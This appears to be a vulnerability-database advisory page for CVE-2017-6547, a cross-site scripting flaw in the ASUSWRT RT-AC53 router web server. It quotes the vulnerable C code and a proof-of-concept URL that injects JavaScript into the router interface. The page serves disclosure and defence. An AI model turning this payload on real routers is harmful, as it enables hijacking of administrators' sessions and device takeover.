| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2017-6547 | 9 Mar 201709:26 | – | cve | |
| CVE-2017-6547 | 9 Mar 201709:26 | – | cvelist | |
| EUVD-2017-15603 | 7 Oct 202500:30 | – | euvd | |
| ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting | 8 Mar 201700:00 | – | exploitpack | |
| CVE-2017-6547 | 9 Mar 201709:59 | – | nvd | |
| ASUS WRT Cross Site Scripting Nmap NSE Script | 7 Apr 201700:00 | – | packetstorm | |
| Cross site scripting | 9 Mar 201709:59 | – | prion | |
| SA148: Linux Kernel Vulnerabilities Feb-Apr 2017 | 9 May 201708:00 | – | symantec | |
| ASUSWRT - Multiple Vulnerabilities | 10 Mar 201700:00 | – | seebug |
Cross-Site Scripting (XSS)
Component: httpd
CVE: CVE-2017-6547
Vulnerability:
httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.
...
if(strlen(file) > 50 &&!(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
{
char inviteCode[256];
snprintf(inviteCode, sizeof(inviteCode), "<script>location.href='/cloud_sync.asp?flag=%s';</script>", file);
send_page( 200, "OK", (char*) 0, inviteCode, 0);
...
PoC:
http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'AData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation